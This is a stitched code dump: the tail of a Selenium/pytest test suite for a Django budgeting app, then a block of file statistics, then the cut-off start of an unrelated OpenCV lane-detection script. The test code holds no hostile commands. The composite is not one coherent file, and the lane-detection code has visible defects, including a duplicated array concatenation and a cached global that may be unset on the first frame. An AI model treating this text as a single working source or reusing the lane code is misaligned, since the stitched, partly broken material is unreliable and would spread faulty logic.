    ) -> None:
        """Bad credentials surface an alert with the standard auth error."""
        url = live_server_path(reverse("login"))
        selenium.get(url)
        self.login_user(selenium, "bar", "xyz")
        messages = [
            m.text
            for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        ]
        assert any(
            "Please enter a correct username and password." in message
            for message in messages
        )

    def test_inactive_user_cant_log_in(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """A deactivated account is rejected; some alert is shown."""
        user_foo.is_active = False
        user_foo.save()
        url = live_server_path(reverse("login"))
        selenium.get(url)
        self.login_user(selenium, "foo", "password")
        # Only assert that *an* alert appears, not its wording:
        assert selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        # Can't check if user is inactive or credentials are wrong - https://code.djangoproject.com/ticket/28645

    def test_next_redirects_to_requested_url(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """The `next` query parameter is honoured after a successful login."""
        url = live_server_path(reverse("login") + "?next=" + reverse("profile"))
        selenium.get(url)
        self.login_user(selenium, "foo", "password")
        assert selenium.current_url == live_server_path(reverse("profile"))

    def test_redirect_if_already_logged_in(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
        authenticate_selenium: Callable[..., WebDriver],
    ) -> None:
        """Visiting the login page while authenticated redirects away."""
        selenium = authenticate_selenium(user=user_foo)
        url = live_server_path(reverse("login"))
        selenium.get(url)
        assert selenium.current_url == live_server_path(reverse("budget_index"))

    def test_not_authenticated_user_accessing_page_is_redirected_to_login_page(
        self, selenium: WebDriver, live_server_path: Callable[[str], str]
    ) -> None:
        """Anonymous access to a protected page bounces to login with `next`."""
        url = live_server_path(reverse("profile"))
        selenium.get(url)
        assert selenium.current_url == live_server_path(
            reverse("login") + "?next=" + reverse("profile")
        )
        assert (
            selenium.find_element_by_id("login_required").text
            == "Please login to see this page."
        )

    def login_user(self, selenium: WebDriver, username: str, password: str) -> None:
        """Fill in and submit the login form on the current page."""
        username_input = selenium.find_element_by_name("username")
        username_input.send_keys(username)
        password_input = selenium.find_element_by_name("password")
        password_input.send_keys(password)
        selenium.find_element_by_xpath('//button[@type="submit"]').click()
class TestSignUp:
    """End-to-end tests for user registration."""

    def test_sign_up_redirects_to_login_page(
        self, selenium: WebDriver, live_server_path: Callable[[str], str]
    ) -> None:
        """Successful sign-up lands back on the login page."""
        url = live_server_path(reverse("signup"))
        selenium.get(url)
        self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
        assert selenium.current_url == live_server_path(reverse("login"))

    def test_message(
        self, selenium: WebDriver, live_server_path: Callable[[str], str]
    ) -> None:
        """Sign-up shows the 'check your inbox' notification."""
        url = live_server_path(reverse("signup"))
        selenium.get(url)
        self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
        messages = [
            m.text
            for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        ]
        assert any(
            "Please check your inbox for activation link." in message
            for message in messages
        )

    def test_user_with_existing_username_cant_sign_up(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """A duplicate username is rejected with a form validation error."""
        url = live_server_path(reverse("signup"))
        selenium.get(url)
        self.sign_up_user(selenium, "foo", "password", "foo@example.com")
        assert (
            selenium.find_element_by_class_name("invalid-feedback").text
            == "A user with that username already exists."
        )

    def test_sign_up_sends_activation_email(
        self, selenium: WebDriver, live_server_path: Callable[[str], str]
    ) -> None:
        """Registering sends the confirmation email to the given address."""
        url = live_server_path(reverse("signup"))
        selenium.get(url)
        self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
        assert mail.outbox
        activation_email = mail.outbox[0]
        assert "foo@example.com" in activation_email.to
        assert activation_email.subject == "Budget Supervisor Email Confirmation"
        assert (
            "Please click the following link to complete your registration."
            in activation_email.body
        )

    def test_sign_up_creates_inactive_user(
        self, selenium: WebDriver, live_server_path: Callable[[str], str]
    ) -> None:
        """New accounts start inactive until confirmed via the email link."""
        url = live_server_path(reverse("signup"))
        selenium.get(url)
        self.sign_up_user(selenium, "foo", "Foo Password", "foo@example.com")
        user = User.objects.get(username="foo")
        assert user.is_active is False

    def sign_up_user(
        self, selenium: WebDriver, username: str, password: str, email: str
    ) -> None:
        """Fill in and submit the sign-up form on the current page."""
        username_input = selenium.find_element_by_name("username")
        username_input.send_keys(username)
        email_input = selenium.find_element_by_name("email")
        email_input.send_keys(email)
        password1_input = selenium.find_element_by_name("password1")
        password1_input.send_keys(password)
        password2_input = selenium.find_element_by_name("password2")
        password2_input.send_keys(password)
        selenium.find_element_by_xpath('//button[@type="submit"]').click()
class TestUserActivateView:
    """End-to-end tests for the email activation link."""

    def test_user_is_activated(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo_inactive: User,
    ) -> None:
        """Following a valid activation link activates the account."""
        self.activate_user(selenium, live_server_path, user_foo_inactive)
        assert user_foo_inactive.is_active is True

    def test_redirect(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo_inactive: User,
    ) -> None:
        """Activation redirects to the login page."""
        self.activate_user(selenium, live_server_path, user_foo_inactive)
        assert selenium.current_url == live_server_path(reverse("login"))

    def test_message(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo_inactive: User,
    ) -> None:
        """Activation shows the 'registration complete' alert."""
        self.activate_user(selenium, live_server_path, user_foo_inactive)
        messages = [
            m.text
            for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        ]
        assert any(
            "Registration complete. Please login." in message for message in messages
        )

    def test_invalid_user_id(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo_inactive: User,
    ) -> None:
        """A link with a non-existent user id shows the confirmation error."""
        # 123 is an id with no matching user.
        user_id = urlsafe_base64_encode(force_bytes(123))
        token = user_tokenizer.make_token(user_foo_inactive)
        url = live_server_path(
            reverse("activate", kwargs={"user_id": user_id, "token": token})
        )
        selenium.get(url)
        messages = [
            m.text
            for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        ]
        assert any(
            "Registration confirmation error. Please click the reset password to generate a new confirmation email."
            in message
            for message in messages
        )

    def test_invalid_token(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo_inactive: User,
    ) -> None:
        """A link with a bogus token shows the confirmation error."""
        user_id = urlsafe_base64_encode(force_bytes(user_foo_inactive.id))
        token = "123"
        url = live_server_path(
            reverse("activate", kwargs={"user_id": user_id, "token": token})
        )
        selenium.get(url)
        messages = [
            m.text
            for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        ]
        assert any(
            "Registration confirmation error. Please click the reset password to generate a new confirmation email."
            in message
            for message in messages
        )

    def activate_user(
        self, selenium: WebDriver, live_server_path: Callable[[str], str], user: User
    ) -> None:
        """Visit a valid activation link for *user* and refresh it from DB."""
        user_id = urlsafe_base64_encode(force_bytes(user.id))
        token = user_tokenizer.make_token(user)
        url = live_server_path(
            reverse("activate", kwargs={"user_id": user_id, "token": token})
        )
        selenium.get(url)
        user.refresh_from_db()
class TestPasswordResetView:
    """End-to-end tests for requesting a password reset email."""

    def test_email(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """Submitting the form sends the reset email to the user's address."""
        self.reset_password(selenium, live_server_path, user_foo.email)
        assert mail.outbox
        password_reset_email = mail.outbox[0]
        assert user_foo.email in password_reset_email.to
        assert password_reset_email.subject == "Budget Supervisor Password Reset"
        assert (
            "Please click the following link to reset your password."
            in password_reset_email.body
        )

    def test_redirect(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """Submitting the form redirects back to the login page."""
        self.reset_password(selenium, live_server_path, user_foo.email)
        assert selenium.current_url == live_server_path(reverse("login"))

    def reset_password(
        self, selenium: WebDriver, live_server_path: Callable[[str], str], email: str
    ) -> None:
        """Fill in and submit the password-reset request form."""
        url = live_server_path(reverse("password_reset"))
        selenium.get(url)
        email_input = selenium.find_element_by_name("email")
        email_input.send_keys(email)
        selenium.find_element_by_xpath('//button[@type="submit"]').click()
class TestPasswordResetConfirmationView:
    """End-to-end tests for the password-reset confirmation form."""

    def test_password_is_changed(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """Submitting a new password updates the stored password hash."""
        old_password = user_foo.password
        self.reset_password(selenium, live_server_path, user_foo, "New Password")
        user_foo.refresh_from_db()
        assert user_foo.password != old_password

    def test_redirect(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """A successful reset logs the user in and shows the budget index."""
        self.reset_password(selenium, live_server_path, user_foo, "New Password")
        assert selenium.current_url == live_server_path(reverse("budget_index"))

    def reset_password(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        user: User,
        password: str,
    ) -> None:
        """Open a valid reset-confirmation link and submit the new password."""
        user_id = urlsafe_base64_encode(force_bytes(user.id))
        token = user_tokenizer.make_token(user)
        url = live_server_path(
            reverse(
                "password_reset_confirm", kwargs={"uidb64": user_id, "token": token}
            )
        )
        selenium.get(url)
        new_password1_input = selenium.find_element_by_name("new_password1")
        new_password1_input.send_keys(password)
        new_password2_input = selenium.find_element_by_name("new_password2")
        new_password2_input.send_keys(password)
        selenium.find_element_by_xpath('//button[@type="submit"]').click()
        # Removed leftover debug output: print(selenium.page_source)
class TestProfileUpdate:
    """End-to-end tests for the profile page."""

    def test_redirect(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
    ) -> None:
        """Saving the profile form stays on / returns to the profile page."""
        selenium = authenticate_selenium(user=profile_foo.user)
        self.update_profile(selenium, live_server_path, profile_foo)
        assert selenium.current_url == live_server_path(reverse("profile"))

    def test_message(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
    ) -> None:
        """Saving the profile form shows the success alert."""
        selenium = authenticate_selenium(user=profile_foo.user)
        self.update_profile(selenium, live_server_path, profile_foo)
        messages = [
            m.text
            for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        ]
        assert any(
            "Profile was updated successfully" in message for message in messages
        )

    def update_profile(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        profile: Profile,
    ) -> None:
        """Open the profile page, submit the form, and refresh *profile*."""
        url = live_server_path(reverse("profile"))
        selenium.get(url)
        element = selenium.find_element_by_xpath('//button[@type="submit"]')
        element.click()
        profile.refresh_from_db()

    def test_profile_can_be_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
    ) -> None:
        """The profile page links to the account-deletion view."""
        selenium = authenticate_selenium(user=profile_foo.user)
        url = live_server_path(reverse("profile"))
        selenium.get(url)
        element = selenium.find_element_by_link_text("Delete account")
        assert element
        assert element.get_attribute("href") == live_server_path(reverse("user_delete"))

    def test_synchronization_can_be_enabled_if_not_already_enabled(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
    ) -> None:
        """Without external sync, the page offers the 'enable' link."""
        selenium = authenticate_selenium(user=profile_foo.user)
        url = live_server_path(reverse("profile"))
        selenium.get(url)
        element = selenium.find_element_by_id("synchronization")
        assert element.text == "Enable external synchronization"
        assert element.get_attribute("href") == live_server_path(
            reverse("profile_connect")
        )

    def test_synchronization_can_be_disabled_if_already_enabled(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo_external: Profile,
    ) -> None:
        """With external sync enabled, the page offers the 'disable' link."""
        selenium = authenticate_selenium(user=profile_foo_external.user)
        url = live_server_path(reverse("profile"))
        selenium.get(url)
        element = selenium.find_element_by_id("synchronization")
        assert element.text == "Disable external synchronization"
        assert element.get_attribute("href") == live_server_path(
            reverse("profile_disconnect")
        )
@pytest.fixture
def remove_temporary_customers() -> Iterable[None]:
    """Snapshot SaltEdge customers before the test and delete any customer
    that was created while it ran."""
    api = customers_api()
    existing = list(api.customers_get().data)
    yield
    # Anything not present in the pre-test snapshot was created by the test.
    for customer in api.customers_get().data:
        if customer not in existing:
            api.customers_customer_id_delete(customer.id)
class TestProfileConnect:
    """Selenium tests for enabling external (SaltEdge) synchronization."""

    def test_profile_is_updated(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Connecting stores an external id on the profile."""
        driver = authenticate_selenium(user=profile_foo.user)
        self.enable_external_synchronization(driver, live_server_path, profile_foo)
        assert profile_foo.external_id is not None
        assert driver.current_url == live_server_path(reverse("profile"))

    def test_redirect(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Connecting redirects back to the profile page."""
        driver = authenticate_selenium(user=profile_foo.user)
        self.enable_external_synchronization(driver, live_server_path, profile_foo)
        assert driver.current_url == live_server_path(reverse("profile"))

    def test_message(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """A success alert is shown after connecting."""
        driver = authenticate_selenium(user=profile_foo.user)
        self.enable_external_synchronization(driver, live_server_path, profile_foo)
        alerts = driver.find_elements_by_xpath('//div[contains(@class, "alert")]')
        texts = [alert.text for alert in alerts]
        assert any("Profile was connected successfully" in text for text in texts)

    def enable_external_synchronization(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        profile: Profile,
    ) -> None:
        """Submit the connect form and reload *profile* from the database."""
        selenium.get(live_server_path(reverse("profile_connect")))
        submit = selenium.find_element_by_xpath('//button[@type="submit"]')
        submit.click()
        profile.refresh_from_db()
class TestProfileDisconnect:
    """Selenium tests for disabling external (SaltEdge) synchronization."""

    def test_profile_is_updated(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Disconnecting clears the external id on the profile."""
        driver = authenticate_selenium(user=profile_foo.user)
        create_customer_in_saltedge(profile_foo, customers_api())
        self.disable_external_synchronization(driver, live_server_path, profile_foo)
        assert profile_foo.external_id is None

    def test_customer_is_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Disconnecting removes the customer on the SaltEdge side too."""
        api = customers_api()
        create_customer_in_saltedge(profile_foo, api)
        external_id = profile_foo.external_id
        driver = authenticate_selenium(user=profile_foo.user)
        # Sanity check: the customer exists before disconnecting.
        assert api.customers_customer_id_get(external_id)
        self.disable_external_synchronization(driver, live_server_path, profile_foo)
        with pytest.raises(ApiException) as excinfo:
            api.customers_customer_id_get(external_id)
        assert "CustomerNotFound" in str(excinfo.value)

    def test_redirect(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Disconnecting redirects back to the profile page."""
        driver = authenticate_selenium(user=profile_foo.user)
        create_customer_in_saltedge(profile_foo, customers_api())
        self.disable_external_synchronization(driver, live_server_path, profile_foo)
        assert driver.current_url == live_server_path(reverse("profile"))

    def test_message(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """A success alert is shown after disconnecting."""
        driver = authenticate_selenium(user=profile_foo.user)
        create_customer_in_saltedge(profile_foo, customers_api())
        self.disable_external_synchronization(driver, live_server_path, profile_foo)
        alerts = driver.find_elements_by_xpath('//div[contains(@class, "alert")]')
        texts = [alert.text for alert in alerts]
        assert any("Profile was disconnected successfully" in text for text in texts)

    def test_connections_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        connection_foo: Connection,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Disconnecting deletes the user's connections."""
        driver = authenticate_selenium(user=profile_foo.user)
        create_customer_in_saltedge(profile_foo, customers_api())
        self.disable_external_synchronization(driver, live_server_path, profile_foo)
        assert not Connection.objects.filter(pk=connection_foo.pk).exists()

    def test_accounts_disconnected(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        account_foo_external: Account,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Disconnecting strips the external id from accounts."""
        driver = authenticate_selenium(user=profile_foo.user)
        create_customer_in_saltedge(profile_foo, customers_api())
        self.disable_external_synchronization(driver, live_server_path, profile_foo)
        account_foo_external.refresh_from_db()
        assert account_foo_external.external_id is None

    def test_transactions_disconnected(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        profile_foo: Profile,
        transaction_foo_external: Transaction,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Disconnecting strips the external id from transactions."""
        driver = authenticate_selenium(user=profile_foo.user)
        create_customer_in_saltedge(profile_foo, customers_api())
        self.disable_external_synchronization(driver, live_server_path, profile_foo)
        transaction_foo_external.refresh_from_db()
        assert transaction_foo_external.external_id is None

    def disable_external_synchronization(
        self,
        selenium: WebDriver,
        live_server_path: Callable[[str], str],
        profile: Profile,
    ) -> None:
        """Submit the disconnect form and reload *profile* from the database."""
        selenium.get(live_server_path(reverse("profile_disconnect")))
        submit = selenium.find_element_by_xpath('//button[@type="submit"]')
        submit.click()
        profile.refresh_from_db()
class TestUserDelete:
    """Selenium tests for the account-deletion flow and its cascades."""

    def test_user_is_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """Confirming deletion removes the User row."""
        selenium = authenticate_selenium(user=user_foo)
        self.delete_user(selenium, live_server_path, user_foo)
        assert not User.objects.filter(pk=user_foo.pk).exists()

    def test_profile_is_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """Deleting the user cascades to their Profile."""
        selenium = authenticate_selenium(user=user_foo)
        self.delete_user(selenium, live_server_path, user_foo)
        assert not Profile.objects.filter(pk=user_foo.profile.pk).exists()

    def test_redirect(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """After deletion the browser ends up on the login page."""
        selenium = authenticate_selenium(user=user_foo)
        self.delete_user(selenium, live_server_path, user_foo)
        assert selenium.current_url == live_server_path(reverse("login"))

    def test_message(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
    ) -> None:
        """A success alert is shown after deletion."""
        selenium = authenticate_selenium(user=user_foo)
        self.delete_user(selenium, live_server_path, user_foo)
        messages = [
            m.text
            for m in selenium.find_elements_by_xpath('//div[contains(@class, "alert")]')
        ]
        assert any("User was deleted successfully" in message for message in messages)

    def test_connections_are_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
        connection_foo: Connection,
    ) -> None:
        """Deleting the user cascades to their connections."""
        selenium = authenticate_selenium(user=user_foo)
        self.delete_user(selenium, live_server_path, user_foo)
        # BUG FIX: the original asserted `not count == 0`, i.e. that the
        # connections still EXISTED after deletion.  Assert the cascade
        # removed them, mirroring the account/transaction tests below.
        assert not Connection.objects.filter(user=user_foo).exists()

    def test_accounts_are_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
        account_foo: Account,
    ) -> None:
        """Deleting the user cascades to their accounts."""
        selenium = authenticate_selenium(user=user_foo)
        self.delete_user(selenium, live_server_path, user_foo)
        assert Account.objects.filter(user=user_foo).count() == 0

    def test_transactions_are_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
        transaction_foo: Transaction,
    ) -> None:
        """Deleting the user cascades to their transactions."""
        selenium = authenticate_selenium(user=user_foo)
        self.delete_user(selenium, live_server_path, user_foo)
        assert Transaction.objects.filter(user=user_foo).count() == 0

    def test_customer_is_deleted(
        self,
        authenticate_selenium: Callable[..., WebDriver],
        live_server_path: Callable[[str], str],
        user_foo: User,
        remove_temporary_customers: Callable[[], Iterable[None]],
    ) -> None:
        """Deleting the user removes the SaltEdge customer as well."""
        api = customers_api()
        create_customer_in_saltedge(user_foo.profile, api)
        selenium = authenticate_selenium(user=user_foo)
        # Sanity check: the customer exists before deletion.
        assert api.customers_customer_id_get(user_foo.profile.external_id)
        self.delete_user(selenium, live_server_path, user_foo)
        with pytest.raises(ApiException) as e:
            api.customers_customer_id_get(user_foo.profile.external_id)
        assert "CustomerNotFound" in str(e.value)

    def delete_user(
        self, selenium: WebDriver, live_server_path: Callable[[str], str], user: User,
    ) -> None:
        """Open the delete-account page and confirm via the submit button."""
        url = live_server_path(reverse("user_delete"))
        selenium.get(url)
        selenium.find_element_by_xpath('//button[@type="submit"]').click()
| 38.259362
| 116
| 0.65735
| 3,137
| 27,585
| 5.473701
| 0.073956
| 0.069303
| 0.097024
| 0.068313
| 0.829072
| 0.811484
| 0.794421
| 0.761691
| 0.742764
| 0.714402
| 0
| 0.001911
| 0.241291
| 27,585
| 720
| 117
| 38.3125
| 0.818529
| 0.003698
| 0
| 0.70092
| 0
| 0
| 0.078745
| 0.015793
| 0
| 0
| 0
| 0
| 0.087423
| 1
| 0.082822
| false
| 0.069018
| 0.019939
| 0
| 0.116564
| 0.003067
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
ff442c57f2a6bb95049fa3ade55ce030d5247ec1
| 9,487
|
py
|
Python
|
YOLO/line_object.py
|
qjadud1994/Alpha-Car
|
4a08890fa67ad0358124df45f49d3e0d109487d8
|
[
"MIT"
] | 16
|
2018-06-07T07:15:55.000Z
|
2021-07-18T08:26:58.000Z
|
YOLO/line_object.py
|
qjadud1994/Alpha-Car
|
4a08890fa67ad0358124df45f49d3e0d109487d8
|
[
"MIT"
] | 7
|
2019-04-18T12:02:04.000Z
|
2020-06-01T16:20:59.000Z
|
YOLO/line_object.py
|
qjadud1994/Alpha-Car
|
4a08890fa67ad0358124df45f49d3e0d109487d8
|
[
"MIT"
] | 10
|
2019-02-01T11:01:00.000Z
|
2021-09-11T14:48:36.000Z
|
import cv2
import numpy as np
import time
# Module state shared by the lane-fit helpers below: the most recent fitted
# line endpoints (lx*/ly* = left lane, gx*/gy* = right lane).  The original
# used a module-level ``global`` statement (a no-op at module scope) and
# wrapped every literal in ``int(0)``; plain assignments are equivalent.
lx1 = lx2 = ly1 = ly2 = 0
gx1 = gy1 = gx2 = gy2 = 0
# Frame width & Height
w = 800
h = 600
def ROI(img, vertices, color3=(255, 255, 255), color1=255):
    """Return *img* masked to the polygon *vertices*.

    Uses *color3* as the fill colour for multi-channel images and *color1*
    for single-channel (grayscale) images.
    """
    mask = np.zeros_like(img)
    # Pick a fill value matching the image depth.
    fill = color3 if len(img.shape) > 2 else color1
    cv2.fillPoly(mask, vertices, fill)
    return cv2.bitwise_and(img, mask)
def get_fitline_left(img, f_lines):
    """Fit a single left-lane segment through the Hough segments *f_lines*.

    Returns ``[x1, y1, x2, y2, mid_x, mid_y]``.  The last successful fit is
    cached in the module globals; when *f_lines* is empty the cached fit is
    reused (or the image centre if nothing was ever fitted).
    """
    global lx1, lx2, ly1, ly2
    lines = f_lines.reshape(f_lines.shape[0] * 2, 2)
    if lines.shape[0] != 0:
        # BUG FIX: cv2.fitLine was previously called before this emptiness
        # check, so an empty input crashed before the fallback could run.
        vx, vy, x, y = cv2.fitLine(lines, cv2.DIST_L2, 0, 0.01, 0.01)
        # Extrapolate the fitted direction to the bottom edge and to a point
        # 100 px below the vertical midpoint of the frame.
        x1, y1 = int(((img.shape[0] - 1) - y) / vy * vx + x), img.shape[0] - 1
        x2, y2 = int(((img.shape[0] / 2 + 100) - y) / vy * vx + x), int(img.shape[0] / 2 + 100)
        lx1, ly1, lx2, ly2 = x1, y1, x2, y2
    else:
        if lx1 == 0 and lx2 == 0 and ly1 == 0 and ly2 == 0:
            # No cached fit yet: degenerate line at the image centre.
            x1, y1 = img.shape[1] / 2, img.shape[0] / 2
            x2, y2 = img.shape[1] / 2, img.shape[0] / 2
        else:
            x1, y1, x2, y2 = lx1, ly1, lx2, ly2
    result = [x1, y1, x2, y2, (x1 + x2) / 2, (y1 + y2) / 2]
    return result
def get_fitline_right(img, f_lines):
    """Fit a single right-lane segment through the Hough segments *f_lines*.

    Returns ``[x1, y1, x2, y2, mid_x, mid_y]``.  The last successful fit is
    cached in the module globals; when *f_lines* is empty the cached fit is
    reused (or the image centre if nothing was ever fitted).
    """
    global gx1, gx2, gy1, gy2
    lines = f_lines.reshape(f_lines.shape[0] * 2, 2)
    if lines.shape[0] != 0:
        # BUG FIX: cv2.fitLine was previously called before this emptiness
        # check, so an empty input crashed before the fallback could run.
        vx, vy, x, y = cv2.fitLine(lines, cv2.DIST_L2, 0, 0.01, 0.01)
        # Extrapolate the fitted direction to the bottom edge and to a point
        # 100 px below the vertical midpoint of the frame.
        x1, y1 = int(((img.shape[0] - 1) - y) / vy * vx + x), img.shape[0] - 1
        x2, y2 = int(((img.shape[0] / 2 + 100) - y) / vy * vx + x), int(img.shape[0] / 2 + 100)
        gx1, gy1, gx2, gy2 = x1, y1, x2, y2
    else:
        if gx1 == 0 and gx2 == 0 and gy1 == 0 and gy2 == 0:
            # No cached fit yet: degenerate line at the image centre.
            x1, y1 = img.shape[1] / 2, img.shape[0] / 2
            x2, y2 = img.shape[1] / 2, img.shape[0] / 2
        else:
            x1, y1, x2, y2 = gx1, gy1, gx2, gy2
    result = [x1, y1, x2, y2, (x1 + x2) / 2, (y1 + y2) / 2]
    return result
def draw(img, lines):
    """Draw the segment ``(lines[0], lines[1]) -> (lines[2], lines[3])``
    on *img* in red (BGR), 6 px thick."""
    start = (lines[0], lines[1])
    end = (lines[2], lines[3])
    cv2.line(img, start, end, (0, 0, 255), 6)
def get_lane(img):
    """Detect left/right lane lines in *img*, draw them, and return
    ``(annotated_image, left_line[x1, y1, x2, y2], right_line[...])``.

    Pipeline: Canny edges -> trapezoid/band ROI -> probabilistic Hough ->
    slope-based split into left/right segment groups -> least-squares line
    fit per side.  The module-level ``line`` caches the last Hough result
    and is reused when Hough finds nothing in the current frame.
    NOTE(review): ``line`` is only assigned after a successful detection, so
    a None Hough result on the very first frame would raise NameError —
    confirm against the caller.
    """
    global line
    height, weight = img.shape[:2]
    #canny_img = cv2.Canny(img, 550, 600)#black, white
    canny_img = cv2.Canny(img, 250, 300) # black, white
    #cv2.imshow("canny", canny_img)
    #vertices = np.array([[(0, height), (270, height / 2), (weight - 270, height / 2), (weight, height)]],
    #                    dtype=np.int32)
    # ROI: the bottom third of the frame.
    vertices = np.array([[(0, height), (0, height * 2 / 3), (weight, height * 2 / 3), (weight, height)]],
                        dtype=np.int32)
    ROI_img = ROI(canny_img, vertices)
    #cv2.imshow('roi', ROI_img)
    #img = cv2.polylines(img, vertices, True, (255, 0 ,0), 5)
    line_arr = cv2.HoughLinesP(ROI_img, 1, np.pi / 180, 50, minLineLength=10, maxLineGap=50)
    # Fall back to the cached result when nothing was found; otherwise
    # squeeze to an (N, 4) array and refresh the cache.
    if type(line_arr).__name__ == 'NoneType':
        line_arr = line
    elif line_arr.shape[0] != 1:
        line_arr = np.squeeze(line_arr)
        line = line_arr
    elif line_arr.shape[0] == 1:
        line_arr = np.squeeze(line_arr, axis=1)
        line = line_arr
    # Angle of each segment in degrees.
    slope_degree = (np.arctan2(line_arr[:, 1] - line_arr[:, 3], line_arr[:, 0] - line_arr[:, 2]) * 180) / np.pi
    # Two parallel filtered views: group 1 = |angle| in (90, 180),
    # group 2 = |angle| in (0, 90).
    line_arr1,line_arr2,slope_degree1,slope_degree2 = line_arr,line_arr,slope_degree,slope_degree
    line_arr1 = line_arr1[np.abs(slope_degree1) < 180]
    slope_degree1 = slope_degree1[np.abs(slope_degree1) < 180]
    line_arr1 = line_arr1[np.abs(slope_degree1) > 90]
    slope_degree1 = slope_degree1[np.abs(slope_degree1) >90]
    line_arr2 = line_arr2[np.abs(slope_degree2) > 0]
    slope_degree2 = slope_degree2[np.abs(slope_degree2) > 0]
    line_arr2 = line_arr2[np.abs(slope_degree2) < 90]
    slope_degree2 = slope_degree2[np.abs(slope_degree2) < 90]
    # Merge whichever groups are non-empty; otherwise re-filter the raw
    # segments to |angle| in (30, 160).
    if line_arr1.shape[0]!=0 and line_arr2.shape[0]!=0:
        # NOTE(review): concatenates line_arr1 twice — line_arr2 was
        # probably intended (slope_degree concatenates 2 then 1); confirm.
        line_arr = np.concatenate((line_arr1,line_arr1),axis=0)
        slope_degree = np.concatenate((slope_degree2,slope_degree1),axis=0)
    elif line_arr1.shape[0]!=0 and line_arr2.shape[0]==0:
